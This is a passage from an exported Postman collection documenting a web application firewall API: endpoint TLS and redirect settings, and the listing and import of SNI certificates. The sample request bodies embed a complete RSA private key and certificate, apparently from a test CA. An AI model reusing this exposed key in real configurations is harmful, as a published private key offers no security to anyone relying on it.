HTTP2\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"cert_type\": {\n            \"description\": \"Select 0 for automatic certificate, or select 1 for custom certificate\",\n            \"type\": \"integer\",\n            \"enum\": [0, 1]\n        },\n        \"ssl_options\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"tls_1_0\": {\n                    \"description\": \"Select 0 to disable to not allow TSL 1.0, or select 1 to enable to allow TSL 1.0\",\n                    \"type\": \"integer\",\n                    \"enum\": [0, 1]\n                },\n                \"tls_1_1\": {\n                    \"description\": \"Select 0 to disable to not allow TSL 1.1, or select 1 to enable to allow TSL 1.1\",\n                    \"type\": \"integer\",\n                    \"enum\": [0, 1]\n                },\n                \"tls_1_2\": {\n                   \"description\": \"Select 0 to disable to not allow TSL 1.2, or select 1 to enable to allow TSL 1.2\",\n                    \"type\": \"integer\",\n                    \"enum\": [0, 1]\n                },\n                \"tls_1_3\": {\n                   \"description\": \"Select 0 to disable to not allow TSL 1.3, or select 1 to enable to allow TSL 1.3\",\n                    \"type\": \"integer\",\n                    \"enum\": [0, 1]\n                },\n                \"encryption_level\": {\n                    \"description\": \"Select 1 to allow other level ciphers, or select 2 to only allow strong ciphers \",\n                    \"type\": \"integer\",\n                    \"enum\": [1, 2]\n                },\n                \"http_2_https\": {\n                   \"description\": \"Select 0 to not to redirect all HTTP traffic to HTTPS, or select 1 to redirect all HTTP traffic to HTTPS \",\n                    \"type\": \"integer\",\n                    \"enum\": [0, 1]\n                }\n            }\n        },\n        \"custom_block_page\": {\n            \"description\": \"Select 'enable' to enable the custom block page, or select 'disable' to disable\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"block_url\": {\n            \"description\": \"The URL of custom block page(start with '/')\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","endpoint"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"8420593c-cb1b-4655-8201-8e5786a5655e","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"http_status\": 1,\n\t\"https_status\": 1,\n\t\"http2_status\": 1,\n\t\"custom_http_port\":8080,\n\t\"custom_https_port\":7443,\n\t\"ipv6_option\":0,\n\t\"extra_domains\": [\"b..example.com\"],\n\t\"cert_type\": 0,\n\t\"ssl_options\": {\n\t\t\"tls_1_0\": 0,\n\t\t\"tls_1_1\": 0,\n\t\t\"tls_1_2\": 0,\n\t\t\"tls_1_3\": 1,\n\t\t\"encryption_level\": 2,\n\t\t\"http_2_https\": 1\n\t},\n\t\"custom_block_page\": \"enable\",\n\t\"block_url\": \"/test.block.html\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","endpoint"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:38:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"47"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c661781a-869b-11e9-b96f-a7a1d2c8a45d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avnwRFQ7oAMFRXQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62001-a754a59a5f3e6a7b759b695c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Update the EndPoints successfully\"\n}"},{"id":"a4a798f0-0ae8-4531-8c3c-9721831ad9b7","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"http_status\": 1,\n\t\"https_status\": 1,\n\t\"http2_status\": 1,\n\t\"ipv6_option\":0,\n\t\"extra_domains\": [\"b..example.com\"],\n\t\"cert_type\": 0,\n    \"custom_http_port\":8080,\n\t\"custom_https_port\":7443,\n\t\"ssl_options\": {\n\t\t\"tls_1_0\": 0,\n\t\t\"tls_1_1\": 0,\n\t\t\"tls_1_2\": 0,\n\t\t\"tls_1_3\": 1,\n\t\t\"encryption_level\": 2,\n\t\t\"http_2_https\": 1\n\t},\n\t\"custom_block_page\": \"enable\",\n\t\"block_url\": \"/test.block.html\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/endpoint","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","endpoint"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:39:26 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e120b283-869b-11e9-848f-1d541ed7c3fd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avn3SE3koAMF_hQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"0d411e12-39b9-4ae4-97d8-727d36482325"},{"name":"Get SNI Certificate","id":"43385127-0f30-44b1-bc0b-a0f853e4af31","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","description":"<p>Get the information of SNI certificates configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","snicertificate"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>An integer, the page size. The value shall be 10, 20, 30.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.</p>\n<p>To go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.</p>\n<p>To go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"},{"description":{"content":"<p>True: the next page;</p>\n<p>False: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"ac7f0e97-c0c4-4254-af41-8754adab979e","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertificate"],"query":[{"key":"size","value":"{{size}}","description":"An integer, the page size. The value shall be 10, 20, 30."},{"key":"cursor","value":"{{cursor}}","description":"It's a string value meaning forward-cursor or backward-cursor."},{"key":"forward","value":"{{forward}}","description":"It's a string value meaning \"forward\" or \"backward\". If it is \"true\", meaning \"forward\". If it is \"false\", meaning \"backward\"."}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"296"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e92e0f63-86a0-11e9-934e-4145cc4e25d4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avtI8EX5IAMFqlg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf6289f-89f6a2e4ec4ac48237acbe68;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"detail\": \"successfully\",\n\t\"total\": 4,\n\t\"prev_cursor\": \"eyJwb2xpY3lfbmFtZV9pZCI6IHsiUyI6ICI4NTk0NTgxODExX3pzaGFuZ19mb3J0aXdlYl9jbG91ZF90ZXN0X2NvbV8xIn0sICJlcF9pZCI6IHsiUyI6ICI4NTk0NTgxODExIn0sICJpZCI6IHsiTiI6ICIxIn19\",\n\t\"next_cursor\": \"\",\n\t\"hits\": [\n\t\t{\n\t\t\t\"id\": 1,\n\t\t\t\"issued_to\": \"test.mytest.com\",\n\t\t\t\"issued_by\": \"MySSL.com\",\n\t\t\t\"san\": [\"home.mytest.com\", \" office.mytest.com\", \"test.mytest.com\"],\n\t\t\t\"expired\": \"2021-01-05 10:08:39 UTC\",\n\t\t\t\"status\": \"Invalid Chain\"\n\t\t},\n\t\t{\n\t\t\t\"id\": 2,\n\t\t\t\"issued_to\": \"www\",\n\t\t\t\"issued_by\": \"subca1\",\n\t\t\t\"san\": [],\n\t\t\t\"expired\": \"2021-02-21 10:38:08 UTC\",\n\t\t\t\"status\": \"Invalid Chain\"\n\t\t},\n\t\t{\n\t\t\t\"id\": 3,\n\t\t\t\"issued_to\": \"test.timweb-cloud-test.com\",\n\t\t\t\"issued_by\": \"MySSL.com\",\n\t\t\t\"san\": [\"test.timweb-cloud-test.com\"],\n\t\t\t\"expired\": \"2021-03-26 10:27:35 UTC\",\n\t\t\t\"status\": \"Invalid Chain\"\n\t\t},\n\t\t{\n\t\t\t\"id\": 4,\n\t\t\t\"issued_to\": \"10000.fwbcloud.com\",\n\t\t\t\"issued_by\": \"ca_rsa\",\n\t\t\t\"san\": [],\n\t\t\t\"expired\": \"2030-04-06 08:32:49 UTC\",\n\t\t\t\"status\": \"Invalid Chain\"\n\t\t}\n\t]\n}"},{"id":"c80fd091-3986-4be5-8c7a-5d92446f9b95","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertificate"],"query":[{"key":"size","value":"{{size}}","description":"An integer, the page size. The value shall be 10, 20, 30."},{"key":"cursor","value":"{{cursor}}","description":"It's a string value meaning forward-cursor or backward-cursor."},{"key":"forward","value":"{{forward}}","description":"It's a string value meaning \"forward\" or \"backward\". If it is \"true\", meaning \"forward\". If it is \"false\", meaning \"backward\"."}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"faedfa15-86a0-11e9-9e5c-4b813cea4e85"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avtNmHoloAMFqMw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"43385127-0f30-44b1-bc0b-a0f853e4af31"},{"name":"Update SNI Certificate","id":"4fb7ee2b-df43-4330-b746-b5b638e08008","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n\t\"private_key\": \"-----BEGIN RSA PRIVATE KEY-----\\nMIIEpAIBAAKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVElaXuI0y0SW3tPn0EQ\\njmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjzvkSboa+DLVc/FOkt\\nFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F4AJB55mUeNu5sHMJ\\n5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3VeWqWpb592iDAi5QyC\\nq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblqWzMD32ODGkD0HO2Q\\nq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABAoIBAEpyIKpkw7cGk82Z\\nXKmk1eByEP1d+EvHGZ/uswR6VNYpzr2WHzyNyiJ4sHpSa6ROH958TrLnvqJy7yMl\\n7hkRv8j8WcMwGnAm4UchFf7whYbgvv6uSisDgAzBYZvAMWxbZvHbOHVHVB93jP2h\\n3xhusfGsiesHUx0nID/bExMlJxlqKMbNlI7jfE8WxhS28+ZNdk+MmXPFiHPFn6DY\\nxAmwyjDV55MyNHePMUVOGJwJSRffVdwdCA78yeFYUhlmRXQFrTDEXsXBUbHy7KvL\\nzcttyg0vkAPb6QyLs1/xQNMa0iNCW558s2bLm1Yk0JCplKkhtDXzx6L6fxa0qcrc\\nLzCjTpECgYEAzBfCXensZH+CvbHp3K3Cm7wEProFcyxsYpEYNpk9oKlPN/X3y9DU\\nsECzz+OhOLsHJIaHTAUOGMrYLvpCEDrCFtrHYZgokCHzr6rgDrFtRkX2rnQlVGDu\\nbjRTsN1sL/8/LKp5LXQYh0TtpViu9TDonANgeJeJBH9o7iQADekydZkCgYEA3iSw\\nKElDYkbXxEBB6ppXlDJv7hI/nm7wR7mMm2lWv5HnfIUmNRg/RJ3/XKdql1VgGdCw\\nfxrIcdM5dsiIzf/nFIW2pM3qJ57cXBBk766mvttvvglqSBpOcnob6epDn5URrgPO\\nM3DPmBFP0J7E90EtFi+jO8uxhofn9dM0YPUtkZ8CgYEAtq+hzPzCHCdDOVfS9TUY\\nWNyQlDFhBXpDPmuQV/cNgg1rmrTybR9t8qLIEZM5UhWfzCMbYoG335tarZpXnj1q\\nVJjbFdHkpTeu8JSs4JoTLW8c44WVkJT/d+gg7dUVrVT2EJ47v+MGvbaGXpYmbdWs\\nsVIYfXlvLXZ6z4esAMe34ikCgYEAkbp9uZ/+TY1t5LfGxlHEHFtOJF7iT1w10se9\\nnwJmvzvHIV/z5abncms355+IhIikh6ro7ikyz8EilHMPlBxJiqQBYnIXJzDHHLpA\\njSAFEXXBA2kHyQ9A4UaL41MkU58mPwMOFZ7vALJyqshNLGscWc6chhClgDzOBe0t\\nEmIlJ78CgYA8lK0H/7oMJe/zdmIKvfFy6aIjqeZCjzxoS8F5uLozfwR3C5R5rdJa\\n5Jsl7wLTY6nit/maGz5nJlw7HMZBQRV22+6cZowbd3vZS4GyF1QAgNet1YOjaKDG\\nbUmOHqSxt7LndI75ut5x75CEaKo6+AvGw7ogEK9sQlfBTmm5u6I6Bw\\u003d\\u003d\\n-----END RSA PRIVATE KEY-----\",\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIETDCCAzSgAwIBAgIQaV1xzti5TqyoqF1V4GBh/TANBgkqhkiG9w0BAQsFADBe\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRl\\nc3QgUlNBIC0gRm9yIHRlc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTAe\\nFw0yMDAxMDYxMDA4MzlaFw0yMTAxMDUxMDA4MzlaMGcxCzAJBgNVBAYTAkNOMRAw\\nDgYDVQQIEwdCZWlqaW5nMRAwDgYDVQQHEwdCZWlqaW5nMQswCQYDVQQKEwJGVDEM\\nMAoGA1UECxMDREVWMRkwFwYDVQQDExB0ZXN0Lnp3c2hhbmcuY29tMIIBIjANBgkq\\nhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVEl\\naXuI0y0SW3tPn0EQjmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjz\\nvkSboa+DLVc/FOktFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F\\n4AJB55mUeNu5sHMJ5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3Ve\\nWqWpb592iDAi5QyCq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblq\\nWzMD32ODGkD0HO2Qq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABo4H8\\nMIH5MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUH\\nAwIwHwYDVR0jBBgwFoAUKIEmBdE0Gj/Bcw+7k88VHD8Dv38wYwYIKwYBBQUHAQEE\\nVzBVMCEGCCsGAQUFBzABhhVodHRwOi8vb2NzcC5teXNzbC5jb20wMAYIKwYBBQUH\\nMAKGJGh0dHA6Ly9jYS5teXNzbC5jb20vbXlzc2x0ZXN0cnNhLmNydDBCBgNVHREE\\nOzA5ghBob21lLnp3c2hhbmcuY29tghMgb2ZmaWNlLnp3c2hhbmcuY29tghB0ZXN0\\nLnp3c2hhbmcuY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBb9jqtvwmvsqOGD0RG5Lkw\\n5Wg6eNwCNqm1PmzQNDvv8F+5dI0D0Y5bOOGyf1hnBfLr9WhorGq5fvobeIltQcA5\\n0tTsPiGXq9/umYJ7npcY+rjw6KBnE3n11hV0eYBDAEbIJAauZ27kF3148x3v32TS\\nkmkcjP/+6/KpELorljAJkVrFfcgrKbgjQdhnXWTRnnDUztr1rhhc5h1/9Yjn/q3C\\nOa3ClG100VNF78ipEVRFv9kObd1XVsc37KBhiZrXx5VWCxSlReFiqNLo9fUD4usB\\nqrsYZXZOTqw6kLRMb+zJZ3Uffkceot995naP+cHP0UC4kOFoNybfbD5s3jxeCsTo\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate","description":"<p>Modify SNI certificates configuration.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"action\": {\n            \"description\": \"The type of the update operation\",\n            \"type\": \"string\",\n            \"enum\": [\"import\", \"delete\"]\n        },\n        \"private_key\": {\n            \"description\": \"The private key of the certificate, required on action 'import'.\",\n            \"type\": \"string\"\n        },\n        \"passwd\": {\n            \"description\": \"Optional. The password of the encrypted private key.\",\n            \"type\": \"string\"\n        },\n        \"certificate\": {\n            \"description\": \"The certificate to be imported, required on action 'import'.\",\n            \"type\": \"string\"\n        },\n        \"id\": {\n            \"description\": \"The certificate id to be deleted, required on action 'delete'.\",\n            \"type\": \"integer\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","snicertificate"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"1bd0bc98-277c-4fca-ba03-64af33652426","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"private_key\": \"-----BEGIN RSA PRIVATE KEY-----\\nMIIEpAIBAAKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVElaXuI0y0SW3tPn0EQ\\njmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjzvkSboa+DLVc/FOkt\\nFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F4AJB55mUeNu5sHMJ\\n5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3VeWqWpb592iDAi5QyC\\nq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblqWzMD32ODGkD0HO2Q\\nq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABAoIBAEpyIKpkw7cGk82Z\\nXKmk1eByEP1d+EvHGZ/uswR6VNYpzr2WHzyNyiJ4sHpSa6ROH958TrLnvqJy7yMl\\n7hkRv8j8WcMwGnAm4UchFf7whYbgvv6uSisDgAzBYZvAMWxbZvHbOHVHVB93jP2h\\n3xhusfGsiesHUx0nID/bExMlJxlqKMbNlI7jfE8WxhS28+ZNdk+MmXPFiHPFn6DY\\nxAmwyjDV55MyNHePMUVOGJwJSRffVdwdCA78yeFYUhlmRXQFrTDEXsXBUbHy7KvL\\nzcttyg0vkAPb6QyLs1/xQNMa0iNCW558s2bLm1Yk0JCplKkhtDXzx6L6fxa0qcrc\\nLzCjTpECgYEAzBfCXensZH+CvbHp3K3Cm7wEProFcyxsYpEYNpk9oKlPN/X3y9DU\\nsECzz+OhOLsHJIaHTAUOGMrYLvpCEDrCFtrHYZgokCHzr6rgDrFtRkX2rnQlVGDu\\nbjRTsN1sL/8/LKp5LXQYh0TtpViu9TDonANgeJeJBH9o7iQADekydZkCgYEA3iSw\\nKElDYkbXxEBB6ppXlDJv7hI/nm7wR7mMm2lWv5HnfIUmNRg/RJ3/XKdql1VgGdCw\\nfxrIcdM5dsiIzf/nFIW2pM3qJ57cXBBk766mvttvvglqSBpOcnob6epDn5URrgPO\\nM3DPmBFP0J7E90EtFi+jO8uxhofn9dM0YPUtkZ8CgYEAtq+hzPzCHCdDOVfS9TUY\\nWNyQlDFhBXpDPmuQV/cNgg1rmrTybR9t8qLIEZM5UhWfzCMbYoG335tarZpXnj1q\\nVJjbFdHkpTeu8JSs4JoTLW8c44WVkJT/d+gg7dUVrVT2EJ47v+MGvbaGXpYmbdWs\\nsVIYfXlvLXZ6z4esAMe34ikCgYEAkbp9uZ/+TY1t5LfGxlHEHFtOJF7iT1w10se9\\nnwJmvzvHIV/z5abncms355+IhIikh6ro7ikyz8EilHMPlBxJiqQBYnIXJzDHHLpA\\njSAFEXXBA2kHyQ9A4UaL41MkU58mPwMOFZ7vALJyqshNLGscWc6chhClgDzOBe0t\\nEmIlJ78CgYA8lK0H/7oMJe/zdmIKvfFy6aIjqeZCjzxoS8F5uLozfwR3C5R5rdJa\\n5Jsl7wLTY6nit/maGz5nJlw7HMZBQRV22+6cZowbd3vZS4GyF1QAgNet1YOjaKDG\\nbUmOHqSxt7LndI75ut5x75CEaKo6+AvGw7ogEK9sQlfBTmm5u6I6Bw\\u003d\\u003d\\n-----END RSA PRIVATE KEY-----\",\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIETDCCAzSgAwIBAgIQaV1xzti5TqyoqF1V4GBh/TANBgkqhkiG9w0BAQsFADBe\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRl\\nc3QgUlNBIC0gRm9yIHRlc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTAe\\nFw0yMDAxMDYxMDA4MzlaFw0yMTAxMDUxMDA4MzlaMGcxCzAJBgNVBAYTAkNOMRAw\\nDgYDVQQIEwdCZWlqaW5nMRAwDgYDVQQHEwdCZWlqaW5nMQswCQYDVQQKEwJGVDEM\\nMAoGA1UECxMDREVWMRkwFwYDVQQDExB0ZXN0Lnp3c2hhbmcuY29tMIIBIjANBgkq\\nhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVEl\\naXuI0y0SW3tPn0EQjmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjz\\nvkSboa+DLVc/FOktFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F\\n4AJB55mUeNu5sHMJ5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3Ve\\nWqWpb592iDAi5QyCq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblq\\nWzMD32ODGkD0HO2Qq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABo4H8\\nMIH5MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUH\\nAwIwHwYDVR0jBBgwFoAUKIEmBdE0Gj/Bcw+7k88VHD8Dv38wYwYIKwYBBQUHAQEE\\nVzBVMCEGCCsGAQUFBzABhhVodHRwOi8vb2NzcC5teXNzbC5jb20wMAYIKwYBBQUH\\nMAKGJGh0dHA6Ly9jYS5teXNzbC5jb20vbXlzc2x0ZXN0cnNhLmNydDBCBgNVHREE\\nOzA5ghBob21lLnp3c2hhbmcuY29tghMgb2ZmaWNlLnp3c2hhbmcuY29tghB0ZXN0\\nLnp3c2hhbmcuY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBb9jqtvwmvsqOGD0RG5Lkw\\n5Wg6eNwCNqm1PmzQNDvv8F+5dI0D0Y5bOOGyf1hnBfLr9WhorGq5fvobeIltQcA5\\n0tTsPiGXq9/umYJ7npcY+rjw6KBnE3n11hV0eYBDAEbIJAauZ27kF3148x3v32TS\\nkmkcjP/+6/KpELorljAJkVrFfcgrKbgjQdhnXWTRnnDUztr1rhhc5h1/9Yjn/q3C\\nOa3ClG100VNF78ipEVRFv9kObd1XVsc37KBhiZrXx5VWCxSlReFiqNLo9fUD4usB\\nqrsYZXZOTqw6kLRMb+zJZ3Uffkceot995naP+cHP0UC4kOFoNybfbD5s3jxeCsTo\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:39:26 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e120b283-869b-11e9-848f-1d541ed7c3fd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avn3SE3koAMF_hQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"d3299dcc-1b78-4d10-acfe-b97bd729efee","name":"Import Successfully","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"private_key\": \"-----BEGIN RSA PRIVATE KEY-----\\nMIIEpAIBAAKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVElaXuI0y0SW3tPn0EQ\\njmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjzvkSboa+DLVc/FOkt\\nFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F4AJB55mUeNu5sHMJ\\n5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3VeWqWpb592iDAi5QyC\\nq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblqWzMD32ODGkD0HO2Q\\nq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABAoIBAEpyIKpkw7cGk82Z\\nXKmk1eByEP1d+EvHGZ/uswR6VNYpzr2WHzyNyiJ4sHpSa6ROH958TrLnvqJy7yMl\\n7hkRv8j8WcMwGnAm4UchFf7whYbgvv6uSisDgAzBYZvAMWxbZvHbOHVHVB93jP2h\\n3xhusfGsiesHUx0nID/bExMlJxlqKMbNlI7jfE8WxhS28+ZNdk+MmXPFiHPFn6DY\\nxAmwyjDV55MyNHePMUVOGJwJSRffVdwdCA78yeFYUhlmRXQFrTDEXsXBUbHy7KvL\\nzcttyg0vkAPb6QyLs1/xQNMa0iNCW558s2bLm1Yk0JCplKkhtDXzx6L6fxa0qcrc\\nLzCjTpECgYEAzBfCXensZH+CvbHp3K3Cm7wEProFcyxsYpEYNpk9oKlPN/X3y9DU\\nsECzz+OhOLsHJIaHTAUOGMrYLvpCEDrCFtrHYZgokCHzr6rgDrFtRkX2rnQlVGDu\\nbjRTsN1sL/8/LKp5LXQYh0TtpViu9TDonANgeJeJBH9o7iQADekydZkCgYEA3iSw\\nKElDYkbXxEBB6ppXlDJv7hI/nm7wR7mMm2lWv5HnfIUmNRg/RJ3/XKdql1VgGdCw\\nfxrIcdM5d